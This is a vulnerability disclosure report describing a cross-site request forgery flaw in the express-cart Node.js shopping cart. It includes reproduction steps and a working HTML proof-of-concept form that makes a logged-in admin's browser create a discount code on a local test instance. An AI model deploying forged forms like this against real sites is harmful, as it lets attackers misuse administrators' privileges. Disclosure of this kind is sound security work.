I would like to report a CSRF vulnerability in `express-cart`.
It allows an attacker to trick an authenticated admin into performing state-changing actions. The root cause is that no CSRF token is used on any form, so the vulnerability is application-wide.
module name: express-cart
version: 1.1.16
npm page: https://www.npmjs.com/package/express-cart
> expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal, Authorize.net, Adyen and Instore payments.
weekly downloads: 21
Steps to reproduce:
1. Create the PoC HTML page below (generated with Burp Suite's CSRF PoC generator) and host it on an attacker-controlled origin.
2. While logged in to the expressCart admin panel (here running on http://localhost:1111), the admin visits the attacker's page and clicks the submit button.
3. The browser sends the cross-site POST to `/admin/settings/discount/create` with the admin's session cookie attached, and the discount code `CSRF-CODE-DEMO` (30% off) is created without the admin's intent.

Check: confirm in the browser's network panel that the forged POST carries the admin's `Cookie` header. Whether it does depends on the session cookie's `SameSite` attribute; a cookie set with `SameSite=Lax` or `Strict` is not sent on a cross-site POST, so the PoC only works when the cookie is sent with `SameSite=None; Secure` or the browser does not default to Lax.
```html
<!-- CSRF PoC: auto-generated by Burp Suite; target is the local test instance on port 1111 -->
<html>
<body>
<!-- Rewrites the visible URL to "/" so the page looks less suspicious to the victim -->
<script>history.pushState('', '', '/')</script>
<!-- No CSRF token field is required because express-cart does not check one -->
<form action="http://localhost:1111/admin/settings/discount/create" method="POST">
<input type="hidden" name="code" value="CSRF-CODE-DEMO" />
<input type="hidden" name="type" value="percent" />
<input type="hidden" name="value" value="30" />
<input type="hidden" name="start" value="21/02/2020 14:32" />
<input type="hidden" name="end" value="22/02/2020 14:32" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
Impact: the attacker can exercise admin privileges, i.e. perform any admin-panel action (such as creating discount codes) simply by luring a logged-in admin to a page they control.